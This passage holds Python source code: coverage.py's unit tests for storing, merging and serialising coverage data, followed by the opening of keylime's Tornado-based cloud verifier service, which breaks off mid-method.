(3, -1): None,
},
'y.py': {
(-1, 17): None,
(17, 23): None,
(23, -1): None,
},
}
X_PY_ARCS_3 = [(-1, 1), (1, 2), (2, 3), (3, -1)]
Y_PY_ARCS_3 = [(-1, 17), (17, 23), (23, -1)]
SUMMARY_3 = {'x.py': 3, 'y.py': 2}
MEASURED_FILES_3 = ['x.py', 'y.py']
X_PY_LINES_3 = [1, 2, 3]
Y_PY_LINES_3 = [17, 23]
ARCS_4 = {
'x.py': {
(-1, 2): None,
(2, 5): None,
(5, -1): None,
},
'z.py': {
(-1, 1000): None,
(1000, -1): None,
},
}
SUMMARY_3_4 = {'x.py': 4, 'y.py': 2, 'z.py': 1}
MEASURED_FILES_3_4 = ['x.py', 'y.py', 'z.py']
class DataTestHelpers(CoverageTest):
"""Test helpers for data tests."""
def assert_line_counts(self, covdata, counts, fullpath=False):
"""Check that the line_counts of `covdata` is `counts`."""
self.assertEqual(line_counts(covdata, fullpath), counts)
def assert_measured_files(self, covdata, measured):
"""Check that `covdata`'s measured files are `measured`."""
self.assertCountEqual(covdata.measured_files(), measured)
def assert_lines1_data(self, covdata):
"""Check that `covdata` has the data from LINES1."""
self.assert_line_counts(covdata, SUMMARY_1)
self.assert_measured_files(covdata, MEASURED_FILES_1)
self.assertCountEqual(covdata.lines("a.py"), A_PY_LINES_1)
self.assertEqual(covdata.run_infos(), [])
self.assertFalse(covdata.has_arcs())
def assert_arcs3_data(self, covdata):
"""Check that `covdata` has the data from ARCS3."""
self.assert_line_counts(covdata, SUMMARY_3)
self.assert_measured_files(covdata, MEASURED_FILES_3)
self.assertCountEqual(covdata.lines("x.py"), X_PY_LINES_3)
self.assertCountEqual(covdata.arcs("x.py"), X_PY_ARCS_3)
self.assertCountEqual(covdata.lines("y.py"), Y_PY_LINES_3)
self.assertCountEqual(covdata.arcs("y.py"), Y_PY_ARCS_3)
self.assertTrue(covdata.has_arcs())
self.assertEqual(covdata.run_infos(), [])
class CoverageDataTest(DataTestHelpers, CoverageTest):
"""Test cases for CoverageData."""
no_files_in_temp_dir = True
def test_empty_data_is_false(self):
covdata = CoverageData()
self.assertFalse(covdata)
def test_line_data_is_true(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
self.assertTrue(covdata)
def test_arc_data_is_true(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
self.assertTrue(covdata)
def test_empty_line_data_is_false(self):
covdata = CoverageData()
covdata.add_lines({})
self.assertFalse(covdata)
def test_empty_arc_data_is_false(self):
covdata = CoverageData()
covdata.add_arcs({})
self.assertFalse(covdata)
def test_adding_lines(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
self.assert_lines1_data(covdata)
def test_adding_arcs(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
self.assert_arcs3_data(covdata)
def test_ok_to_add_lines_twice(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
covdata.add_lines(LINES_2)
self.assert_line_counts(covdata, SUMMARY_1_2)
self.assert_measured_files(covdata, MEASURED_FILES_1_2)
def test_ok_to_add_arcs_twice(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_arcs(ARCS_4)
self.assert_line_counts(covdata, SUMMARY_3_4)
self.assert_measured_files(covdata, MEASURED_FILES_3_4)
def test_cant_add_arcs_with_lines(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
with self.assertRaisesRegex(CoverageException, "Can't add arcs to existing line data"):
covdata.add_arcs(ARCS_3)
def test_cant_add_lines_with_arcs(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
with self.assertRaisesRegex(CoverageException, "Can't add lines to existing arc data"):
covdata.add_lines(LINES_1)
def test_touch_file_with_lines(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
covdata.touch_file('zzz.py')
self.assert_measured_files(covdata, MEASURED_FILES_1 + ['zzz.py'])
def test_touch_file_with_arcs(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
covdata.touch_file('zzz.py')
self.assert_measured_files(covdata, MEASURED_FILES_3 + ['zzz.py'])
def test_set_query_contexts(self):
covdata = CoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
covdata.set_query_contexts(['test_*'])
self.assertEqual(covdata.lines('a.py'), [1, 2])
covdata.set_query_contexts(['other*'])
self.assertEqual(covdata.lines('a.py'), [])
def test_no_lines_vs_unmeasured_file(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
covdata.touch_file('zzz.py')
self.assertEqual(covdata.lines('zzz.py'), [])
self.assertIsNone(covdata.lines('no_such_file.py'))
def test_lines_with_contexts(self):
covdata = CoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
self.assertEqual(covdata.lines('a.py'), [1, 2])
self.assertEqual(covdata.lines('a.py', contexts=['test*']), [1, 2])
self.assertEqual(covdata.lines('a.py', contexts=['other*']), [])
def test_contexts_by_lineno_with_lines(self):
covdata = CoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
self.assertDictEqual(
covdata.contexts_by_lineno('a.py'),
{1: ['test_a'], 2: ['test_a']})
def test_run_info(self):
self.skip_unless_data_storage_is("json")
covdata = CoverageData()
self.assertEqual(covdata.run_infos(), [])
covdata.add_run_info(hello="there")
self.assertEqual(covdata.run_infos(), [{"hello": "there"}])
covdata.add_run_info(count=17)
self.assertEqual(covdata.run_infos(), [{"hello": "there", "count": 17}])
def test_no_duplicate_lines(self):
covdata = CoverageData()
covdata.set_context("context1")
covdata.add_lines(LINES_1)
covdata.set_context("context2")
covdata.add_lines(LINES_1)
self.assertEqual(covdata.lines('a.py'), A_PY_LINES_1)
def test_no_duplicate_arcs(self):
covdata = CoverageData()
covdata.set_context("context1")
covdata.add_arcs(ARCS_3)
covdata.set_context("context2")
covdata.add_arcs(ARCS_3)
self.assertEqual(covdata.arcs('x.py'), X_PY_ARCS_3)
def test_no_arcs_vs_unmeasured_file(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
covdata.touch_file('zzz.py')
self.assertEqual(covdata.lines('zzz.py'), [])
self.assertIsNone(covdata.lines('no_such_file.py'))
self.assertEqual(covdata.arcs('zzz.py'), [])
self.assertIsNone(covdata.arcs('no_such_file.py'))
def test_arcs_with_contexts(self):
covdata = CoverageData()
covdata.set_context('test_x')
covdata.add_arcs(ARCS_3)
self.assertEqual(
covdata.arcs('x.py'), [(-1, 1), (1, 2), (2, 3), (3, -1)])
self.assertEqual(covdata.arcs(
'x.py', contexts=['test*']), [(-1, 1), (1, 2), (2, 3), (3, -1)])
self.assertEqual(covdata.arcs('x.py', contexts=['other*']), [])
def test_contexts_by_lineno_with_arcs(self):
covdata = CoverageData()
covdata.set_context('test_x')
covdata.add_arcs(ARCS_3)
self.assertDictEqual(
covdata.contexts_by_lineno('x.py'),
{-1: ['test_x'], 1: ['test_x'], 2: ['test_x'], 3: ['test_x']})
def test_contexts_by_lineno_with_unknown_file(self):
covdata = CoverageData()
self.assertDictEqual(
covdata.contexts_by_lineno('xyz.py'), {})
def test_file_tracer_name(self):
covdata = CoverageData()
covdata.add_lines({
"p1.foo": dict.fromkeys([1, 2, 3]),
"p2.html": dict.fromkeys([10, 11, 12]),
"main.py": dict.fromkeys([20]),
})
covdata.add_file_tracers({"p1.foo": "p1.plugin", "p2.html": "p2.plugin"})
self.assertEqual(covdata.file_tracer("p1.foo"), "p1.plugin")
self.assertEqual(covdata.file_tracer("main.py"), "")
self.assertIsNone(covdata.file_tracer("p3.not_here"))
def test_cant_file_tracer_unmeasured_files(self):
covdata = CoverageData()
msg = "Can't add file tracer data for unmeasured file 'p1.foo'"
with self.assertRaisesRegex(CoverageException, msg):
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
covdata.add_lines({"p2.html": dict.fromkeys([10, 11, 12])})
with self.assertRaisesRegex(CoverageException, msg):
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
def test_cant_change_file_tracer_name(self):
covdata = CoverageData()
covdata.add_lines({"p1.foo": dict.fromkeys([1, 2, 3])})
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
msg = "Conflicting file tracer name for 'p1.foo': u?'p1.plugin' vs u?'p1.plugin.foo'"
with self.assertRaisesRegex(CoverageException, msg):
covdata.add_file_tracers({"p1.foo": "p1.plugin.foo"})
def test_update_lines(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata2 = CoverageData(suffix='2')
covdata2.add_lines(LINES_2)
covdata3 = CoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
self.assert_line_counts(covdata3, SUMMARY_1_2)
self.assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assertEqual(covdata3.run_infos(), [])
def test_update_arcs(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_arcs(ARCS_3)
covdata2 = CoverageData(suffix='2')
covdata2.add_arcs(ARCS_4)
covdata3 = CoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
self.assert_line_counts(covdata3, SUMMARY_3_4)
self.assert_measured_files(covdata3, MEASURED_FILES_3_4)
self.assertEqual(covdata3.run_infos(), [])
def test_update_run_info(self):
self.skip_unless_data_storage_is("json")
covdata1 = CoverageData()
covdata1.add_arcs(ARCS_3)
covdata1.add_run_info(hello="there", count=17)
covdata2 = CoverageData()
covdata2.add_arcs(ARCS_4)
covdata2.add_run_info(hello="goodbye", count=23)
covdata3 = CoverageData()
covdata3.update(covdata1)
covdata3.update(covdata2)
self.assertEqual(covdata3.run_infos(), [
{'hello': 'there', 'count': 17},
{'hello': 'goodbye', 'count': 23},
])
def test_update_cant_mix_lines_and_arcs(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata2 = CoverageData(suffix='2')
covdata2.add_arcs(ARCS_3)
with self.assertRaisesRegex(CoverageException, "Can't combine arc data with line data"):
covdata1.update(covdata2)
with self.assertRaisesRegex(CoverageException, "Can't combine line data with arc data"):
covdata2.update(covdata1)
def test_update_file_tracers(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_lines({
"p1.html": dict.fromkeys([1, 2, 3, 4]),
"p2.html": dict.fromkeys([5, 6, 7]),
"main.py": dict.fromkeys([10, 11, 12]),
})
covdata1.add_file_tracers({
"p1.html": "html.plugin",
"p2.html": "html.plugin2",
})
covdata2 = CoverageData(suffix='2')
covdata2.add_lines({
"p1.html": dict.fromkeys([3, 4, 5, 6]),
"p2.html": dict.fromkeys([7, 8, 9]),
"p3.foo": dict.fromkeys([1000, 1001]),
"main.py": dict.fromkeys([10, 11, 12]),
})
covdata2.add_file_tracers({
"p1.html": "html.plugin",
"p2.html": "html.plugin2",
"p3.foo": "foo_plugin",
})
covdata3 = CoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
self.assertEqual(covdata3.file_tracer("p1.html"), "html.plugin")
self.assertEqual(covdata3.file_tracer("p2.html"), "html.plugin2")
self.assertEqual(covdata3.file_tracer("p3.foo"), "foo_plugin")
self.assertEqual(covdata3.file_tracer("main.py"), "")
def test_update_conflicting_file_tracers(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_lines({"p1.html": dict.fromkeys([1, 2, 3])})
covdata1.add_file_tracers({"p1.html": "html.plugin"})
covdata2 = CoverageData(suffix='2')
covdata2.add_lines({"p1.html": dict.fromkeys([1, 2, 3])})
covdata2.add_file_tracers({"p1.html": "html.other_plugin"})
msg = "Conflicting file tracer name for 'p1.html': u?'html.plugin' vs u?'html.other_plugin'"
with self.assertRaisesRegex(CoverageException, msg):
covdata1.update(covdata2)
msg = "Conflicting file tracer name for 'p1.html': u?'html.other_plugin' vs u?'html.plugin'"
with self.assertRaisesRegex(CoverageException, msg):
covdata2.update(covdata1)
def test_update_file_tracer_vs_no_file_tracer(self):
covdata1 = CoverageData(suffix="1")
covdata1.add_lines({"p1.html": dict.fromkeys([1, 2, 3])})
covdata1.add_file_tracers({"p1.html": "html.plugin"})
covdata2 = CoverageData(suffix="2")
covdata2.add_lines({"p1.html": dict.fromkeys([1, 2, 3])})
msg = "Conflicting file tracer name for 'p1.html': u?'html.plugin' vs u?''"
with self.assertRaisesRegex(CoverageException, msg):
covdata1.update(covdata2)
msg = "Conflicting file tracer name for 'p1.html': u?'' vs u?'html.plugin'"
with self.assertRaisesRegex(CoverageException, msg):
covdata2.update(covdata1)
def test_asking_isnt_measuring(self):
# Asking about an unmeasured file shouldn't make it seem measured.
covdata = CoverageData()
self.assert_measured_files(covdata, [])
self.assertEqual(covdata.arcs("missing.py"), None)
self.assert_measured_files(covdata, [])
def test_add_to_hash_with_lines(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
hasher = mock.Mock()
add_data_to_hash(covdata, "a.py", hasher)
self.assertEqual(hasher.method_calls, [
mock.call.update([1, 2]), # lines
mock.call.update(""), # file_tracer name
])
def test_add_to_hash_with_arcs(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_file_tracers({"y.py": "hologram_plugin"})
hasher = mock.Mock()
add_data_to_hash(covdata, "y.py", hasher)
self.assertEqual(hasher.method_calls, [
mock.call.update([(-1, 17), (17, 23), (23, -1)]), # arcs
mock.call.update("hologram_plugin"), # file_tracer name
])
def test_add_to_lines_hash_with_missing_file(self):
# https://bitbucket.org/ned/coveragepy/issues/403
covdata = CoverageData()
covdata.add_lines(LINES_1)
hasher = mock.Mock()
add_data_to_hash(covdata, "missing.py", hasher)
self.assertEqual(hasher.method_calls, [
mock.call.update([]),
mock.call.update(None),
])
def test_add_to_arcs_hash_with_missing_file(self):
# https://bitbucket.org/ned/coveragepy/issues/403
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_file_tracers({"y.py": "hologram_plugin"})
hasher = mock.Mock()
add_data_to_hash(covdata, "missing.py", hasher)
self.assertEqual(hasher.method_calls, [
mock.call.update([]),
mock.call.update(None),
])
def test_empty_lines_are_still_lines(self):
covdata = CoverageData()
covdata.add_lines({})
covdata.touch_file("abc.py")
self.assertFalse(covdata.has_arcs())
def test_empty_arcs_are_still_arcs(self):
covdata = CoverageData()
covdata.add_arcs({})
covdata.touch_file("abc.py")
self.assertTrue(covdata.has_arcs())
def test_read_and_write_are_opposites(self):
covdata1 = CoverageData()
covdata1.add_arcs(ARCS_3)
covdata1.write()
covdata2 = CoverageData()
covdata2.read()
self.assert_arcs3_data(covdata2)
def test_thread_stress(self):
covdata = CoverageData()
def thread_main():
"""Every thread will try to add the same data."""
covdata.add_lines(LINES_1)
threads = [threading.Thread(target=thread_main) for _ in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assert_lines1_data(covdata)
class CoverageDataTestInTempDir(DataTestHelpers, CoverageTest):
"""Tests of CoverageData that need a temporary directory to make files."""
def test_read_write_lines(self):
covdata1 = CoverageData("lines.dat")
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData("lines.dat")
covdata2.read()
self.assert_lines1_data(covdata2)
def test_read_write_arcs(self):
covdata1 = CoverageData("arcs.dat")
covdata1.add_arcs(ARCS_3)
covdata1.write()
covdata2 = CoverageData("arcs.dat")
covdata2.read()
self.assert_arcs3_data(covdata2)
def test_read_errors(self):
msg = r"Couldn't .* '.*[/\\]{0}': \S+"
self.make_file("xyzzy.dat", "xyzzy")
with self.assertRaisesRegex(CoverageException, msg.format("xyzzy.dat")):
covdata = CoverageData("xyzzy.dat")
covdata.read()
self.assertFalse(covdata)
self.make_file("empty.dat", "")
with self.assertRaisesRegex(CoverageException, msg.format("empty.dat")):
covdata = CoverageData("empty.dat")
covdata.read()
self.assertFalse(covdata)
def test_read_sql_errors(self):
with sqlite3.connect("wrong_schema.db") as con:
con.execute("create table coverage_schema (version integer)")
con.execute("insert into coverage_schema (version) values (99)")
msg = r"Couldn't .* '.*[/\\]{}': wrong schema: 99 instead of \d+".format("wrong_schema.db")
with self.assertRaisesRegex(CoverageException, msg):
covdata = CoverageData("wrong_schema.db")
covdata.read()
self.assertFalse(covdata)
with sqlite3.connect("no_schema.db") as con:
con.execute("create table foobar (baz text)")
msg = r"Couldn't .* '.*[/\\]{}': \S+".format("no_schema.db")
with self.assertRaisesRegex(CoverageException, msg):
covdata = CoverageData("no_schema.db")
covdata.read()
self.assertFalse(covdata)
class CoverageDataFilesTest(DataTestHelpers, CoverageTest):
"""Tests of CoverageData file handling."""
no_files_in_temp_dir = True
def test_reading_missing(self):
self.assert_doesnt_exist(".coverage")
covdata = CoverageData()
covdata.read()
self.assert_line_counts(covdata, {})
def test_writing_and_reading(self):
covdata1 = CoverageData()
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData()
covdata2.read()
self.assert_line_counts(covdata2, SUMMARY_1)
def test_debug_output_with_debug_option(self):
# With debug option dataio, we get debug output about reading and
# writing files.
debug = DebugControlString(options=["dataio"])
covdata1 = CoverageData(debug=debug)
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData(debug=debug)
covdata2.read()
self.assert_line_counts(covdata2, SUMMARY_1)
self.assertRegex(
debug.get_output(),
r"^Erasing data file '.*\.coverage'\n"
r"Creating data file '.*\.coverage'\n"
r"Opening data file '.*\.coverage'\n$"
)
def test_debug_output_without_debug_option(self):
# With a debug object, but not the dataio option, we don't get debug
# output.
debug = DebugControlString(options=[])
covdata1 = CoverageData(debug=debug)
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData(debug=debug)
covdata2.read()
self.assert_line_counts(covdata2, SUMMARY_1)
self.assertEqual(debug.get_output(), "")
def test_explicit_suffix(self):
self.assert_doesnt_exist(".coverage.SUFFIX")
covdata = CoverageData(suffix='SUFFIX')
covdata.add_lines(LINES_1)
covdata.write()
self.assert_exists(".coverage.SUFFIX")
self.assert_doesnt_exist(".coverage")
def test_true_suffix(self):
self.assert_file_count(".coverage.*", 0)
# suffix=True will make a randomly named data file.
covdata1 = CoverageData(suffix=True)
covdata1.add_lines(LINES_1)
covdata1.write()
self.assert_doesnt_exist(".coverage")
data_files1 = glob.glob(".coverage.*")
self.assertEqual(len(data_files1), 1)
# Another suffix=True will choose a different name.
covdata2 = CoverageData(suffix=True)
covdata2.add_lines(LINES_1)
covdata2.write()
self.assert_doesnt_exist(".coverage")
data_files2 = glob.glob(".coverage.*")
self.assertEqual(len(data_files2), 2)
# In addition to being different, the suffixes have the pid in them.
self.assertTrue(all(str(os.getpid()) in fn for fn in data_files2))
def test_combining(self):
self.assert_file_count(".coverage.*", 0)
covdata1 = CoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata1.write()
self.assert_exists(".coverage.1")
self.assert_file_count(".coverage.*", 1)
covdata2 = CoverageData(suffix='2')
covdata2.add_lines(LINES_2)
covdata2.write()
self.assert_exists(".coverage.2")
self.assert_file_count(".coverage.*", 2)
covdata3 = CoverageData()
combine_parallel_data(covdata3)
self.assert_line_counts(covdata3, SUMMARY_1_2)
self.assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_file_count(".coverage.*", 0)
def test_erasing(self):
covdata1 = CoverageData()
covdata1.add_lines(LINES_1)
covdata1.write()
covdata1.erase()
self.assert_line_counts(covdata1, {})
covdata2 = CoverageData()
covdata2.read()
self.assert_line_counts(covdata2, {})
def test_erasing_parallel(self):
self.make_file("datafile.1")
self.make_file("datafile.2")
self.make_file(".coverage")
data = CoverageData("datafile")
data.erase(parallel=True)
self.assert_file_count("datafile.*", 0)
self.assert_exists(".coverage")
def test_combining_with_aliases(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_lines({
'/home/ned/proj/src/a.py': {1: None, 2: None},
'/home/ned/proj/src/sub/b.py': {3: None},
'/home/ned/proj/src/template.html': {10: None},
})
covdata1.add_file_tracers({
'/home/ned/proj/src/template.html': 'html.plugin',
})
covdata1.write()
covdata2 = CoverageData(suffix='2')
covdata2.add_lines({
r'c:\ned\test\a.py': {4: None, 5: None},
r'c:\ned\test\sub\b.py': {3: None, 6: None},
})
covdata2.write()
self.assert_file_count(".coverage.*", 2)
covdata3 = CoverageData()
aliases = PathAliases()
aliases.add("/home/ned/proj/src/", "./")
aliases.add(r"c:\ned\test", "./")
combine_parallel_data(covdata3, aliases=aliases)
self.assert_file_count(".coverage.*", 0)
# covdata3 hasn't been written yet. Should this file exist or not?
#self.assert_exists(".coverage")
apy = canonical_filename('./a.py')
sub_bpy = canonical_filename('./sub/b.py')
template_html = canonical_filename('./template.html')
self.assert_line_counts(covdata3, {apy: 4, sub_bpy: 2, template_html: 1}, fullpath=True)
self.assert_measured_files(covdata3, [apy, sub_bpy, template_html])
self.assertEqual(covdata3.file_tracer(template_html), 'html.plugin')
def test_combining_from_different_directories(self):
os.makedirs('cov1')
covdata1 = CoverageData('cov1/.coverage.1')
covdata1.add_lines(LINES_1)
covdata1.write()
os.makedirs('cov2')
covdata2 = CoverageData('cov2/.coverage.2')
covdata2.add_lines(LINES_2)
covdata2.write()
# This data won't be included.
covdata_xxx = CoverageData('.coverage.xxx')
covdata_xxx.add_arcs(ARCS_3)
covdata_xxx.write()
covdata3 = CoverageData()
combine_parallel_data(covdata3, data_paths=['cov1', 'cov2'])
self.assert_line_counts(covdata3, SUMMARY_1_2)
self.assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_doesnt_exist("cov1/.coverage.1")
self.assert_doesnt_exist("cov2/.coverage.2")
self.assert_exists(".coverage.xxx")
def test_combining_from_files(self):
os.makedirs('cov1')
covdata1 = CoverageData('cov1/.coverage.1')
covdata1.add_lines(LINES_1)
covdata1.write()
os.makedirs('cov2')
covdata2 = CoverageData('cov2/.coverage.2')
covdata2.add_lines(LINES_2)
covdata2.write()
# This data won't be included.
covdata_xxx = CoverageData('.coverage.xxx')
covdata_xxx.add_arcs(ARCS_3)
covdata_xxx.write()
covdata_2xxx = CoverageData('cov2/.coverage.xxx')
covdata_2xxx.add_arcs(ARCS_3)
covdata_2xxx.write()
covdata3 = CoverageData()
combine_parallel_data(covdata3, data_paths=['cov1', 'cov2/.coverage.2'])
self.assert_line_counts(covdata3, SUMMARY_1_2)
self.assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_doesnt_exist("cov1/.coverage.1")
self.assert_doesnt_exist("cov2/.coverage.2")
self.assert_exists(".coverage.xxx")
self.assert_exists("cov2/.coverage.xxx")
def test_combining_from_nonexistent_directories(self):
covdata = CoverageData()
msg = "Couldn't combine from non-existent path 'xyzzy'"
with self.assertRaisesRegex(CoverageException, msg):
combine_parallel_data(covdata, data_paths=['xyzzy'])
def test_interleaved_erasing_bug716(self):
# pytest-cov could produce this scenario. #716
covdata1 = CoverageData()
covdata2 = CoverageData()
# this used to create the .coverage database file..
covdata2.set_context("")
# then this would erase it all..
covdata1.erase()
# then this would try to use tables that no longer exist.
# "no such table: meta"
covdata2.add_lines(LINES_1)
class DumpsLoadsTest(DataTestHelpers, CoverageTest):
"""Tests of CoverageData.dumps and loads."""
run_in_temp_dir = False
def test_serialization(self):
covdata1 = CoverageData(no_disk=True)
covdata1.add_lines(LINES_1)
covdata1.add_lines(LINES_2)
serial = covdata1.dumps()
covdata2 = CoverageData(no_disk=True)
covdata2.loads(serial)
self.assert_line_counts(covdata2, SUMMARY_1_2)
self.assert_measured_files(covdata2, MEASURED_FILES_1_2)
def test_misfed_serialization(self):
covdata = CoverageData(no_disk=True)
bad_data = b'Hello, world!\x07 ' + b'z' * 100
msg = r"Unrecognized serialization: {} \(head of {} bytes\)".format(
re.escape(repr(bad_data[:40])),
len(bad_data),
)
with self.assertRaisesRegex(CoverageException, msg):
covdata.loads(bad_data)
|
cloud_verifier_tornado.py
|
#!/usr/bin/python3
"""
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
"""
import asyncio
import functools
import os
import signal
import sys
import traceback
from multiprocessing import Process
import tornado.ioloop
import tornado.web
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy.orm.exc import NoResultFound
from keylime import api_version as keylime_api_version
from keylime import (
cloud_verifier_common,
config,
json,
keylime_logging,
revocation_notifier,
tornado_requests,
web_util,
)
from keylime.agentstates import AgentAttestStates
from keylime.common import retry, states, validators
from keylime.db.keylime_db import DBEngineManager, SessionManager
from keylime.db.verifier_db import VerfierMain, VerifierAllowlist
from keylime.elchecking import policies
from keylime.failure import MAX_SEVERITY_LABEL, Component, Failure
logger = keylime_logging.init_logging("cloudverifier")
try:
engine = DBEngineManager().make_engine("cloud_verifier")
except SQLAlchemyError as err:
logger.error("Error creating SQL engine or session: %s", err)
sys.exit(1)
def get_session():
return SessionManager().make_session(engine)
def get_AgentAttestStates():
return AgentAttestStates.get_instance()
# The "exclude_db" dict values are removed from the response before adding the dict to the DB
# This is because we want these values to remain ephemeral and not stored in the database.
exclude_db = {
"registrar_data": "",
"nonce": "",
"b64_encrypted_V": "",
"provide_V": True,
"num_retries": 0,
"pending_event": None,
"first_verified": False,
# the following 3 items are updated to VerifierDB only when the AgentState is stored
"boottime": "",
"ima_pcrs": [],
"pcr10": "",
"next_ima_ml_entry": 0,
"learned_ima_keyrings": {},
"ssl_context": None,
}
def _from_db_obj(agent_db_obj):
fields = [
"agent_id",
"v",
"ip",
"port",
"operational_state",
"public_key",
"tpm_policy",
"meta_data",
"mb_refstate",
"allowlist",
"ima_sign_verification_keys",
"revocation_key",
"accept_tpm_hash_algs",
"accept_tpm_encryption_algs",
"accept_tpm_signing_algs",
"hash_alg",
"enc_alg",
"sign_alg",
"boottime",
"ima_pcrs",
"pcr10",
"next_ima_ml_entry",
"learned_ima_keyrings",
"supported_version",
"mtls_cert",
"ak_tpm",
]
agent_dict = {}
for field in fields:
agent_dict[field] = getattr(agent_db_obj, field, None)
# add default fields that are ephemeral
for key, val in exclude_db.items():
agent_dict[key] = val
return agent_dict
def verifier_db_delete_agent(session, agent_id):
get_AgentAttestStates().delete_by_agent_id(agent_id)
session.query(VerfierMain).filter_by(agent_id=agent_id).delete()
session.commit()
def store_attestation_state(agentAttestState):
# Only store if IMA log was evaluated
if agentAttestState.get_ima_pcrs():
session = get_session()
try:
update_agent = session.query(VerfierMain).get(agentAttestState.get_agent_id())
update_agent.boottime = agentAttestState.get_boottime()
update_agent.next_ima_ml_entry = agentAttestState.get_next_ima_ml_entry()
ima_pcrs_dict = agentAttestState.get_ima_pcrs()
update_agent.ima_pcrs = list(ima_pcrs_dict.keys())
for pcr_num, value in ima_pcrs_dict.items():
setattr(update_agent, f"pcr{pcr_num}", value)
update_agent.learned_ima_keyrings = agentAttestState.get_ima_keyrings().to_json()
try:
session.add(update_agent)
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error on storing attestation state: %s", e)
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error on storing attestation state: %s", e)
class BaseHandler(tornado.web.RequestHandler):
def prepare(self): # pylint: disable=W0235
super().prepare()
def write_error(self, status_code, **kwargs):
self.set_header("Content-Type", "text/json")
if self.settings.get("serve_traceback") and "exc_info" in kwargs:
# in debug mode, try to send a traceback
lines = []
for line in traceback.format_exception(*kwargs["exc_info"]):
lines.append(line)
self.finish(
json.dumps(
{
"code": status_code,
"status": self._reason,
"traceback": lines,
"results": {},
}
)
)
else:
self.finish(
json.dumps(
{
"code": status_code,
"status": self._reason,
"results": {},
}
)
)
def data_received(self, chunk):
raise NotImplementedError()
class MainHandler(tornado.web.RequestHandler):
def head(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface instead")
def get(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface instead")
def delete(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface instead")
def post(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface instead")
def put(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface instead")
def data_received(self, chunk):
raise NotImplementedError()
class VersionHandler(BaseHandler):
def head(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use GET interface instead")
def get(self):
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None:
web_util.echo_json_response(self, 405, "Not Implemented")
return
if "version" not in rest_params:
web_util.echo_json_response(self, 400, "URI not supported")
logger.warning("GET returning 400 response. URI not supported: %s", self.request.path)
return
version_info = {
"current_version": keylime_api_version.current_version(),
"supported_versions": keylime_api_version.all_versions(),
}
web_util.echo_json_response(self, 200, "Success", version_info)
def delete(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use GET interface instead")
def post(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use GET interface instead")
def put(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use GET interface instead")
def data_received(self, chunk):
raise NotImplementedError()
class AgentsHandler(BaseHandler):
mtls_options = None # Stores the cert, key and password used by the verifier for mTLS connections
def initialize(self, mtls_options):
self.mtls_options = mtls_options
def head(self):
"""HEAD not supported"""
web_util.echo_json_response(self, 405, "HEAD not supported")
def get(self):
"""This method handles the GET requests to retrieve status on agents from the Cloud Verifier.
Currently, only agents resources are available for GETing, i.e. /agents. All other GET uri's
will return errors. Agents requests require a single agent_id parameter which identifies the
agent to be returned. If the agent_id is not found, a 404 response is returned. If the agent_id
was not found, it either completed successfully, or failed. If found, the agent_id is still polling
to contact the Cloud Agent.
"""
session = get_session()
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None:
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
if "agents" not in rest_params:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("GET returning 400 response. uri not supported: %s", self.request.path)
return
agent_id = rest_params["agents"]
if (agent_id is not None) and (agent_id != ""):
# If the agent ID is not valid (wrong set of characters),
# just do nothing.
if not validators.valid_agent_id(agent_id):
